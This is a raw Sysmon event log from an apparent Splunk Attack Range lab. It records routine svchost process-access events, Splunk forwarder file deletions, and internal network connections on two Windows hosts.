16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062003Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062002Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062001Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001062000Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061999Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061998Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061997Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061996Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061995Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061994Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061993Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E66-6063-8C00-00000000AF01}4964C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061992Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061991Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061990Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061989Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061988Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061987Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061986Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061985Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.372{7F8C56E7-4E3C-6063-0D00-00000000AF01}892912C:\Windows\system32\svchost.exe{7F8C56E7-4E69-6063-9100-00000000AF01}4772C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061984Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:29.278{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=337A4D20C841AEA8A6C46C9E4606934C,SHA256=FB52CEB64BF1B0D26C6DA8594B30495AAE75A516D75793946E7D224908625491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246669Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:29.523{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4C41D8CB8628A73D44F8289A2675928,SHA256=18868ABDA3144DC739E30B8679A4587613B83E19CC7E7F0A3A30A8DD4F9EB1EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001062015Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:30.685{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B3C46F34E4E066A16CD9EFF50AB8E41,SHA256=9E8F81E3D96EE433E4AB85AFFD12096988FDF95B3EAD89E60F2E78A3F1917B69,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001062014Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:27.853{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54864-false10.0.1.12-8000- 23542300x8000000000000000246670Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:30.538{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CF097CD5813A3119CDA5EE8E17CFE96,SHA256=7D616A2B1C3259D5F0FBB38DD6341089F3C608B37F0247392C50D7137ED85635,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246671Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:31.538{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3A10A537FB92A904E52C69683701221,SHA256=0C8E5DC4269590B3E401D9875849AB220A8489625813DE6DC9DC3F94C790C1D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246672Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:32.538{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB40C6700548E150729140498E74875,SHA256=08156355A1B6556EE1DA370BAF4D6ADAF351543B4DF3730E983915FC4BBFFB6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246675Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:33.538{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E797CFFE53FDBEE020679B19DB9178,SHA256=C887A45E8954096F8BD9EA99AE45538E25EB8938E6910DE4697EE72DFA6CA833,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246674Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:33.179{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27450EA5FB301BEB9368C34D7DC02A75,SHA256=C3FB2FDD93A8B60F613324744175DBCB635C9794D0FDB4C36742BB398E056521,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246673Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:33.179{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=33FF2AEDCCDF4D431D5225E9E2EC6492,SHA256=7F86C2ADD230FFF89CAD756D055BD5BF9E47C57F3D00D5CA890CB90C62931DA6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246676Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:32.614{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64829-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000-